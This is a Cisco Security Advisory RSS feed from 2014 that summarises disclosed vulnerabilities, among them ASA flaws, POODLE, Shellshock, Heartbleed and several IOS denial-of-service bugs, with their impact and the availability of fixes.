Cisco Security Advisory http://tools.cisco.com/security/center/psirtrss20/CiscoSecurityAdvisory.xml en-us 1992-2010 Cisco Systems, Inc. All rights reserved. Security Advisories Cisco Systems, Inc. 15 Multiple Vulnerabilities in Cisco ASA Software http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20141008-asa?vs_f=Cisco%20Security%20Advisory&vs_cat=Security%20Intelligence&vs_type=RSS&vs_p=Multiple%20Vulnerabilities%20in%20Cisco%20ASA%20Software&vs_k=1 <img src="http://www.cisco.com/swa/j/zag2_vs_log1.asc?Log=1&vs_f=Cisco Security Advisory&vs_cat=Security%20Intelligence&vs_type=RSS&vs_k=1&vs_p=Multiple Vulnerabilities in Cisco ASA Software" border='0' height='0' width='0'></img>Cisco Adaptive Security Appliance (ASA) Software is affected by the following vulnerabilities: <ul> <li>Cisco ASA SQL*NET Inspection Engine Denial of Service Vulnerability</li> <li>Cisco ASA VPN Denial of Service Vulnerability</li> <li>Cisco ASA IKEv2 Denial of Service Vulnerability </li> <li>Cisco ASA Health and Performance Monitor Denial of Service Vulnerability</li> <li>Cisco ASA GPRS Tunneling Protocol Inspection Engine Denial of Service Vulnerability</li> <li>Cisco ASA SunRPC Inspection Engine Denial of Service Vulnerability</li> <li>Cisco ASA DNS Inspection Engine Denial of Service Vulnerability</li> <li>Cisco ASA VPN Failover Command Injection Vulnerability</li> <li>Cisco ASA VNMC Command Input Validation Vulnerability</li> <li>Cisco ASA Local Path Inclusion Vulnerability </li> <li>Cisco ASA Clientless SSL VPN Information Disclosure and Denial of Service Vulnerability </li> <li>Cisco ASA Clientless SSL VPN Portal Customization Integrity Vulnerability</li> <li>Cisco ASA Smart Call Home Digital Certificate Validation Vulnerability </li> </ul> These vulnerabilities are independent of one another; a release that is affected by one of the vulnerabilities may not be affected by the others.<br /> <br /> Successful exploitation of the Cisco ASA SQL*NET Inspection Engine Denial of Service Vulnerability, Cisco ASA VPN Denial of Service Vulnerability, Cisco ASA IKEv2 Denial of Service Vulnerability, Cisco ASA Health and Performance Monitor Denial of Service Vulnerability, Cisco ASA GPRS Tunneling Protocol Inspection Engine Denial of Service Vulnerability, Cisco ASA SunRPC Inspection Engine Denial of Service Vulnerability, and Cisco ASA DNS Inspection Engine Denial of Service Vulnerability may result in a reload of an affected device, leading to a denial of service (DoS) condition.<br /> <br /> Successful exploitation of the Cisco ASA VPN Failover Command Injection Vulnerability, Cisco ASA VNMC Command Input Validation Vulnerability, and Cisco ASA Local Path Inclusion Vulnerability may result in full compromise of the affected system.<br /> <br /> Successful exploitation of the Cisco ASA Clientless SSL VPN Information Disclosure and Denial of Service Vulnerability may result in the disclosure of internal information or, in some cases, a reload of the affected system.<br /> <br /> Successful exploitation of the Cisco ASA Clientless SSL VPN Portal Customization Integrity Vulnerability may result in a compromise of the Clientless SSL VPN portal, which may lead to several types of attacks, which are not limited to cross-site scripting (XSS), stealing of credentials, or redirects of users to malicious web pages.<br /> <br /> Successful exploitation of the Cisco ASA Smart Call Home Digital Certificate Validation Vulnerability may result in a digital certificate validation bypass, which could allow the attacker to bypass digital certificate authentication and gain access inside the network via remote access VPN or management access to the affected system via the Cisco Adaptive Security Device Management (ASDM).<br /> <br /> Cisco has released free software updates that address these vulnerabilities. Workarounds that mitigate some of these vulnerabilities are available.<br /> <br /> This advisory is available at the following link:<br /> <a href="http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20141008-asa">http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20141008-asa</a> Fri, 24 Oct 2014 15:44:11 PDT http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20141008-asa SSL Padding Oracle On Downgraded Legacy Encryption (POODLE) Vulnerability http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20141015-poodle?vs_f=Cisco%20Security%20Advisory&vs_cat=Security%20Intelligence&vs_type=RSS&vs_p=SSL%20Padding%20Oracle%20On%20Downgraded%20Legacy%20Encryption%20(POODLE)%20Vulnerability&vs_k=1 <img src="http://www.cisco.com/swa/j/zag2_vs_log1.asc?Log=1&vs_f=Cisco Security Advisory&vs_cat=Security%20Intelligence&vs_type=RSS&vs_k=1&vs_p=SSL Padding Oracle On Downgraded Legacy Encryption (POODLE) Vulnerability" border='0' height='0' width='0'></img>On October 14, 2014, a vulnerability was publicly announced in the Secure Sockets Layer version 3 (SSLv3) protocol when using a block cipher in Cipher Block Chaining (CBC) mode. SSLv3 is a cryptographic protocol designed to provide communication security, which has been superseded by Transport Layer Security (TLS) protocols. By exploiting this vulnerability, an attacker could decrypt a subset of the encrypted communication.<br /> <br /> This advisory is available at the following link:<br /> <a href="http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20141015-poodle">http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20141015-poodle</a> Fri, 24 Oct 2014 01:12:58 PDT http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20141015-poodle TCP Vulnerabilities in Multiple Non-IOS Cisco Products http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20040420-tcp-nonios?vs_f=Cisco%20Security%20Advisory&vs_cat=Security%20Intelligence&vs_type=RSS&vs_p=TCP%20Vulnerabilities%20in%20Multiple%20Non-IOS%20Cisco%20Products&vs_k=1 <img src="http://www.cisco.com/swa/j/zag2_vs_log1.asc?Log=1&vs_f=Cisco Security Advisory&vs_cat=Security%20Intelligence&vs_type=RSS&vs_k=1&vs_p=TCP Vulnerabilities in Multiple Non-IOS Cisco Products" border='0' height='0' width='0'></img><p> A vulnerability in the Transmission Control Protocol (TCP) specification (RFC793) has been discovered by an external researcher. The successful exploitation enables an adversary to reset any established TCP connection in a much shorter time than was previously discussed publicly. Depending on the application, the connection may get automatically re-established. In other cases, a user will have to repeat the action (for example, open a new Telnet or SSH session). Depending upon the attacked protocol, a successful attack may have additional consequences beyond terminated connection which must be considered. This attack vector is only applicable to the sessions which are terminating on a device (such as a router, switch, or computer), and not to the sessions that are only passing through the device (for example, transit traffic that is being routed by a router). In addition, the attack vector does not directly compromise data integrity or confidentiality. </p> <p> All Cisco products which contain a TCP stack are susceptible to this vulnerability. </p> <p> This advisory is available at <a href="http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20040420-tcp-nonios"> http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20040420-tcp-nonios</a>, and it describes this vulnerability as it applies to Cisco products that do not run Cisco IOS&reg; software. </p> <p> A companion advisory that describes this vulnerability for products that run Cisco IOS software is available at <a href="http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20040420-tcp-ios">http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20040420-tcp-ios</a>. </p> Thu, 23 Oct 2014 12:53:51 PDT http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20040420-tcp-nonios GNU Bash Environment Variable Command Injection Vulnerability http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash?vs_f=Cisco%20Security%20Advisory&vs_cat=Security%20Intelligence&vs_type=RSS&vs_p=GNU%20Bash%20Environment%20Variable%20Command%20Injection%20Vulnerability&vs_k=1 <img src="http://www.cisco.com/swa/j/zag2_vs_log1.asc?Log=1&vs_f=Cisco Security Advisory&vs_cat=Security%20Intelligence&vs_type=RSS&vs_k=1&vs_p=GNU Bash Environment Variable Command Injection Vulnerability" border='0' height='0' width='0'></img><p class="line874" style="text-align: left;">On September 24, 2014, a vulnerability in the Bash shell was publicly announced. The vulnerability is related to the way in which shell functions are passed though environment variables. The vulnerability may allow an attacker to inject commands into a Bash shell, depending on how the shell is invoked. The Bash shell may be invoked by a number of processes including, but not limited to, telnet, SSH, DHCP, and scripts hosted on web servers.</p> All versions of GNU Bash starting with version 1.14 are affected by this vulnerability and the specific impact is determined by the characteristics of the process using the Bash shell. In the worst case, an unauthenticated remote attacker would be able to execute commands on an affected server. However, in most cases involving Cisco products, authentication is required before exploitation could be attempted.<br /> <br /> A number of Cisco products ship with or use an affected version of the Bash shell. The Bash shell is a third-party software component that is part of the GNU software project and used by a number of software vendors. As of this version of the Security Advisory, there have been a number of vulnerabilities recently discovered in the Bash shell, and the investigation is ongoing. This advisory will be updated as additional information becomes available. Cisco may release free software updates that address this vulnerability if a product is determined to be affected by this vulnerability. This advisory is available at the following link:<br /> <a href="http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash">http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash</a> Wed, 22 Oct 2014 16:18:33 PDT http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash Cisco IronPort Appliances Telnet Remote Code Execution Vulnerability http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120126-ironport?vs_f=Cisco%20Security%20Advisory&vs_cat=Security%20Intelligence&vs_type=RSS&vs_p=Cisco%20IronPort%20Appliances%20Telnet%20Remote%20Code%20Execution%20Vulnerability&vs_k=1 <img src="http://www.cisco.com/swa/j/zag2_vs_log1.asc?Log=1&vs_f=Cisco Security Advisory&vs_cat=Security%20Intelligence&vs_type=RSS&vs_k=1&vs_p=Cisco IronPort Appliances Telnet Remote Code Execution Vulnerability" border='0' height='0' width='0'></img><span id="ctl00_MainBodyContainer_DgFields_ctl03_lblField">Cisco AsyncOS Software</span> for Cisco <span id="ctl00_MainBodyContainer_DgFields_ctl03_lblField">Web Security Appliance (WSA)</span>, Cisco Email Security Appliance (ESA), and Cisco Content Security Management Appliance (SMA) contain a vulnerability that may allow a remote, unauthenticated attacker to execute arbitrary code with elevated privileges. <br /> <br /> Cisco has released free software updates that address this vulnerability. Workarounds that mitigate this vulnerability are available. <br /> <br /> <strong>Note:</strong> This security advisory has been updated to include important information about Cisco WSA<br /> <br /> This advisory is available at the following link:<br /> <a href="http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120126-ironport">http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120126-ironport</a> Thu, 16 Oct 2014 13:40:20 PDT http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20120126-ironport Cisco TelePresence MCU Software Memory Exhaustion Vulnerability http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20141015-mcu?vs_f=Cisco%20Security%20Advisory&vs_cat=Security%20Intelligence&vs_type=RSS&vs_p=Cisco%20TelePresence%20MCU%20Software%20Memory%20Exhaustion%20Vulnerability&vs_k=1 <img src="http://www.cisco.com/swa/j/zag2_vs_log1.asc?Log=1&vs_f=Cisco Security Advisory&vs_cat=Security%20Intelligence&vs_type=RSS&vs_k=1&vs_p=Cisco TelePresence MCU Software Memory Exhaustion Vulnerability" border='0' height='0' width='0'></img>A vulnerability in the network stack of Cisco TelePresence MCU Software could allow an unauthenticated, remote attacker to cause the exhaustion of available memory which could lead to system instability and a reload of the affected system.<br /> <br /> Cisco has released free software updates that address this vulnerability. Workarounds that mitigate this vulnerability are not available. This advisory is available at the following link:<br /> <a href="http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20141015-mcu">http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20141015-mcu</a><br /> <br /> <br /> <strong>Note:</strong>&nbsp;This security advisory does not provide information about the GNU Bash Environment Variable Command Injection Vulnerability (also known as <em>Shellshock</em>). For additional information regarding Cisco products affected by this vulnerability, refer to the Cisco Security Advisory at the following link: <a href="http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash">http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash</a> Wed, 15 Oct 2014 16:00:00 PDT http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20141015-mcu Multiple Vulnerabilities in Cisco TelePresence Video Communication Server and Cisco Expressway Software http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20141015-vcs?vs_f=Cisco%20Security%20Advisory&vs_cat=Security%20Intelligence&vs_type=RSS&vs_p=Multiple%20Vulnerabilities%20in%20Cisco%20TelePresence%20Video%20Communication%20Server%20and%20Cisco%20Expressway%20Software&vs_k=1 <img src="http://www.cisco.com/swa/j/zag2_vs_log1.asc?Log=1&vs_f=Cisco Security Advisory&vs_cat=Security%20Intelligence&vs_type=RSS&vs_k=1&vs_p=Multiple Vulnerabilities in Cisco TelePresence Video Communication Server and Cisco Expressway Software" border='0' height='0' width='0'></img>Cisco TelePresence Video Communication Server (VCS) and Cisco Expressway Software includes the following vulnerabilities:<br /> <ul> <li>Cisco TelePresence VCS and Cisco Expressway Crafted Packets Denial of Service Vulnerability</li> <li>Cisco TelePresence VCS and Cisco Expressway SIP IX Filter Denial of Service Vulnerability</li> <li>Cisco TelePresence VCS and Cisco Expressway SIP Denial of Service Vulnerability </li> </ul> Succesfull exploitation of any of these vulnerabilities could allow an unauthenticated, remote attacker to cause a reload of the affected system, which may result in a Denial of Service (DoS) condition.<br /> <br /> Cisco has released free software updates that address these vulnerabilities. Workarounds that mitigate these vulnerabilities are not available. This advisory is available at the following link:<br /> <a href="http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20141015-vcs">http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20141015-vcs</a><br /> <br /> <strong>Note:</strong>&nbsp;This security advisory does not provide information about the GNU Bash Environment Variable Command Injection Vulnerability (also known as <em>Shellshock</em>). For additional information regarding Cisco products affected by this vulnerability, refer to the Cisco Security Advisory at the following link: <a href="http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash">http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash</a> Wed, 15 Oct 2014 16:00:00 PDT http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20141015-vcs Multiple Vulnerabilities in Cisco Unified Communications Domain Manager http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140702-cucdm?vs_f=Cisco%20Security%20Advisory&vs_cat=Security%20Intelligence&vs_type=RSS&vs_p=Multiple%20Vulnerabilities%20in%20Cisco%20Unified%20Communications%20Domain%20Manager&vs_k=1 <img src="http://www.cisco.com/swa/j/zag2_vs_log1.asc?Log=1&vs_f=Cisco Security Advisory&vs_cat=Security%20Intelligence&vs_type=RSS&vs_k=1&vs_p=Multiple Vulnerabilities in Cisco Unified Communications Domain Manager" border='0' height='0' width='0'></img>Cisco Unified Communications Domain Manager (Cisco Unified CDM) is affected by the following vulnerabilities:<br /> <ul> <li>Cisco Unified Communications Domain Manager Privilege Escalation Vulnerability</li> <li>Cisco Unified Communications Domain Manager Default SSH Key Vulnerability </li> <li>Cisco Unified Communications Domain Manager BVSMWeb Unauthorized Data Manipulation Vulnerability </li> </ul> <p>Successful exploitation of the&nbsp;Cisco Unified Communications Domain Manager Privilege Escalation Vulnerability or of the Cisco Unified Communications Domain Manager Default SSH Key Vulnerability may allow an attacker to execute arbitrary commands or obtain privileged access to the affected system.</p> Successful exploitation of the Cisco Unified Communications Domain Manager BVSMWeb Unauthorized Data Manipulation Vulnerability may allow an attacker to access and modify BVSMWeb portal user <span id="ctl00_MainBodyContainer_DgFields_ctl02_lblField">information such settings in the personal phone directory, speed dials, Single Number Reach, and call forward settings.</span><br /> <br /> Cisco has released free software updates that address the Cisco Unified Communications Domain Manager Privilege Escalation Vulnerability and the Cisco Unified Communications Domain Manager Default SSH Key Vulnerability. <br /> Cisco will provide a free software update for the Cisco Unified Communications Domain Manager BVSMWeb Unauthorized Data Manipulation Vulnerability as soon as the fix is available.<br /> <br /> Workarounds that mitigate these vulnerabilities are not available.&nbsp;Customers that are concerned about the Cisco Unified Communications Domain Manager BVSMWeb Unauthorized Data Manipulation Vulnerability may apply the mitigation detailed in the "Workarounds" section of this advisory. <br /> <br /> <strong>Note:</strong> Due to an error in the fix of the Cisco Unified Communications Domain Manager Default SSH Key Vulnerability, all Cisco Unified CDM Platform Software releases are vulnerable regardless if a previous patch has been applied due to this security advisory. This advisory has been updated to provide additional information about the fix for the Cisco Unified Communications Domain Manager Default SSH Key Vulnerability.<br /> <br /> <br /> This advisory is available at the following link:<br /> <a href="http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140702-cucdm">http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140702-cucdm</a> Mon, 13 Oct 2014 15:55:13 PDT http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140702-cucdm OpenSSL Heartbeat Extension Vulnerability in Multiple Cisco Products http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140409-heartbleed?vs_f=Cisco%20Security%20Advisory&vs_cat=Security%20Intelligence&vs_type=RSS&vs_p=OpenSSL%20Heartbeat%20Extension%20Vulnerability%20in%20Multiple%20Cisco%20Products&vs_k=1 <img src="http://www.cisco.com/swa/j/zag2_vs_log1.asc?Log=1&vs_f=Cisco Security Advisory&vs_cat=Security%20Intelligence&vs_type=RSS&vs_k=1&vs_p=OpenSSL Heartbeat Extension Vulnerability in Multiple Cisco Products" border='0' height='0' width='0'></img>Multiple Cisco products incorporate a version of the OpenSSL package affected by a vulnerability that could allow an unauthenticated, remote attacker to retrieve memory in chunks of 64 kilobytes from a connected client or server.<br /> <br /> The vulnerability is due to a missing bounds check in the handling of the Transport Layer Security (TLS) heartbeat extension. An attacker could exploit this vulnerability by implementing a malicious TLS or Datagram Transport Layer Security (DTLS) client, if trying to exploit the vulnerability on an affected server, or a malicious TLS or DTLS server, if trying to exploit the vulnerability on an affected client. An exploit could send a specially crafted TLS or DTLS heartbeat packet to the connected client or server. An exploit could allow the attacker to disclose a limited portion of memory from a connected client or server for every heartbeat packet sent. The disclosed portions of memory could contain sensitive information that may include private keys and passwords.<br /> <br /> Please note that the devices that are affected by this vulnerability are the devices acting as an SSL server terminating SSL connections or devices acting as an SSL Client initiating an SSL connection. Devices that are simply traversed by SSL traffic without terminating it are not affected. <br /> <br /> This advisory will be updated as additional information becomes available. Cisco will release free software updates that address these vulnerabilities. Workarounds that mitigate these vulnerabilities may be available. This advisory is available at the following link:<br /> <a href="http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140409-heartbleed">http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140409-heartbleed</a> Thu, 09 Oct 2014 20:16:45 PDT http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140409-heartbleed Cisco IOS Software RSVP Vulnerability http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140924-rsvp?vs_f=Cisco%20Security%20Advisory&vs_cat=Security%20Intelligence&vs_type=RSS&vs_p=Cisco%20IOS%20Software%20RSVP%20Vulnerability&vs_k=1 <img src="http://www.cisco.com/swa/j/zag2_vs_log1.asc?Log=1&vs_f=Cisco Security Advisory&vs_cat=Security%20Intelligence&vs_type=RSS&vs_k=1&vs_p=Cisco IOS Software RSVP Vulnerability" border='0' height='0' width='0'></img>A vulnerability in the implementation of the Resource Reservation Protocol (RSVP) in Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker cause the device to reload. This vulnerability could be exploited repeatedly to cause an extended denial of service (DoS) condition.<br /> <br /> Cisco has released free software updates that address this vulnerability.<br /> <br /> A workaround that mitigates this vulnerability is available.<br /> <br /> This advisory is available at the following link: <br /> <a href="http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140924-rsvp">http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140924-rsvp</a><br /> <br /> <span id="ctl00_MainBodyContainer_DgFields_ctl02_lblField"><strong>Note:</strong> The September 24, 2014, Cisco IOS Software Security Advisory bundled publication includes six Cisco Security Advisories. All advisories address vulnerabilities in Cisco IOS Software. Individual publication links are in <em>Cisco Event Response: Semiannual Cisco IOS Software Security Advisory Bundled Publication</em> at the following link: <p><a href="http://www.cisco.com/web/about/security/intelligence/Cisco_ERP_sep14.html">http://www.cisco.com/web/about/security/intelligence/Cisco_ERP_sep14.html</a></p> </span> Fri, 26 Sep 2014 19:15:33 PDT http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140924-rsvp Cisco IOS Software DHCP Version 6 Denial of Service Vulnerability http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140924-dhcpv6?vs_f=Cisco%20Security%20Advisory&vs_cat=Security%20Intelligence&vs_type=RSS&vs_p=Cisco%20IOS%20Software%20DHCP%20Version%206%20Denial%20of%20Service%20Vulnerability&vs_k=1 <img src="http://www.cisco.com/swa/j/zag2_vs_log1.asc?Log=1&vs_f=Cisco Security Advisory&vs_cat=Security%20Intelligence&vs_type=RSS&vs_k=1&vs_p=Cisco IOS Software DHCP Version 6 Denial of Service Vulnerability" border='0' height='0' width='0'></img>A vulnerability in the DHCP version 6 (DHCPv6) server implementation of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition.<br /> <br /> The vulnerability is due to improper parsing of malformed DHCPv6 packets. An attacker could exploit this vulnerability by sending malformed DHCPv6 packets to be processed by an affected device. An exploit could allow the attacker to cause a memory leak and eventual reload of an affected device.<br /> <br /> Cisco has released free software updates that address this vulnerability. This advisory is available at the following link:<br /> <a href="http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140924-dhcpv6">http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140924-dhcpv6</a><br /> <br /> <span id="ctl00_MainBodyContainer_DgFields_ctl02_lblField"><strong>Note:</strong> The September 24, 2014, Cisco IOS Software Security Advisory bundled publication includes six Cisco Security Advisories. All advisories address vulnerabilities in Cisco IOS Software. Individual publication links are in <em>Cisco Event Response: Semiannual Cisco IOS Software Security Advisory Bundled Publication</em> at the following link: <p><a href="http://www.cisco.com/web/about/security/intelligence/Cisco_ERP_sep14.html">http://www.cisco.com/web/about/security/intelligence/Cisco_ERP_sep14.html</a></p> </span> Wed, 24 Sep 2014 16:00:00 PDT http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140924-dhcpv6 Multiple Vulnerabilities in Cisco IOS Software Multicast Domain Name System http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140924-mdns?vs_f=Cisco%20Security%20Advisory&vs_cat=Security%20Intelligence&vs_type=RSS&vs_p=Multiple%20Vulnerabilities%20in%20Cisco%20IOS%20Software%20Multicast%20Domain%20Name%20System&vs_k=1 <img src="http://www.cisco.com/swa/j/zag2_vs_log1.asc?Log=1&vs_f=Cisco Security Advisory&vs_cat=Security%20Intelligence&vs_type=RSS&vs_k=1&vs_p=Multiple Vulnerabilities in Cisco IOS Software Multicast Domain Name System" border='0' height='0' width='0'></img>The Cisco IOS Software implementation of the multicast Domain Name System (mDNS) feature contains the following vulnerabilities when processing mDNS packets that could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition: <ul> <li>Cisco IOS Software mDNS Gateway Memory Leak Vulnerability</li> <li>Cisco IOS Software mDNS Gateway Denial of Service Vulnerability</li> </ul> Cisco has released free software updates that address these vulnerabilities. This advisory is available at the following link:<br /> <a href="http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140924-mdns">http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140924-mdns</a><br /> <br /> <span id="ctl00_MainBodyContainer_DgFields_ctl02_lblField"><strong>Note:</strong> The September 24, 2014, Cisco IOS Software Security Advisory bundled publication includes six Cisco Security Advisories. All advisories address vulnerabilities in Cisco IOS Software. Individual publication links are in <em>Cisco Event Response: Semiannual Cisco IOS Software Security Advisory Bundled Publication</em> at the following link: <p><a href="http://www.cisco.com/web/about/security/intelligence/Cisco_ERP_sep14.html">http://www.cisco.com/web/about/security/intelligence/Cisco_ERP_sep14.html</a></p> </span> Wed, 24 Sep 2014 16:00:00 PDT http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140924-mdns